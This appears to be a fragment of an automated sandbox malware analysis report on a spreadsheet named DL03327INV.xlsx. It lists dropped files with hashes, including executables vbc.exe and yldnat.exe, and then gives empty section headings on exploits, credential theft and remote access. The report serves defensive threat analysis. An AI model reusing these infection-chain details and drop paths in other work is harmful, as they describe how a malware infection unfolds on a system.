C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\77AC4BD4.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	8E3A74F7AA420B02D34C69E625969C0A	4743F57F0F702C5B47FA1668D9173E08ADA16448	0CD83C55739629F98FE6AFD3E25A5BCBB346CBEF58BC592C1260E9F0FA8575A9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E77A502.wmf	ms-windows metafont .wmf	30935B0D56A69E2E57355F8033ADF98B	5F7C13E36023A1B3B3DAF030291C02631347C2AB	077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
C:\Users\user\AppData\Local\Temp\boswagvgna	data	D4AA661B180DF0D15BB6D0DC8342B8BA	07310F7D0C29CD6A18AE1174578F61B08E2BA844	E12B146FD62913D6650FCAF490CF973008929E47FD247CB3BD75B6E854CFDD89
C:\Users\user\AppData\Local\Temp\l4nnhna3wvu7agf	data	0B70240F412D375469A67F4E364E6EDD	877D66CBFFF0712D91ED65C7545577729B34CB1A	DAAE8081EFFED8BB74D40479D2264D791A8539F1ED8565438640EE6681D5DC64
C:\Users\user\AppData\Local\Temp\nss8A2D.tmp	data	C2F526011A8F4C1202583C0F68C272D7	6E43958FE2A7B13C248C45369E6B4113185A1B78	E3AA52846C6BC0E920C12B442E4E08EDE1D409D0A99069A19BB801162204A38B
C:\Users\user\AppData\Local\Temp\yldnat.exe	PE32 executable (GUI) Intel 80386, for MS Windows	BC3C746DB1D3F8A821BBDF17CA023450	12459C0EF96BDE1490B00FC9C6F09D69FBEC046F	C503A6FBE974E2C177FAFFFC2F2D9F7C26473909A2AB054E305B0E231C54B785
C:\Users\user\AppData\Local\Temp\~DF8200AD3C92400B31.TMP	CDFV2 Encrypted	5B4A67AC532A5D8900B815144F0FB845	6DA306004E084780E9F57F3702A5EC22E72FFF6C	98FC7157DAFDE651C3AB515663E3A91F034B49175E2E2495C00576C4B8E9E96D
C:\Users\user\AppData\Local\Temp\~DFA02A15C6E61E2243.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DFB8C99282338AF6F8.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DFD268A41FBC2DE634.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\Desktop\~$DL03327INV.xlsx	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	DE76EF6A11A63EFC00B0303888BC0B7F	7AB24456A49F6B61BC54D20A4D9C0B84F3AE696B	FC6EBE8BC215A292BB3DF340A84350CEB2BE7187EFC8E10381235CFA8D82F734

Windows Analysis Report DL03327INV.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
DL03327INV.xlsx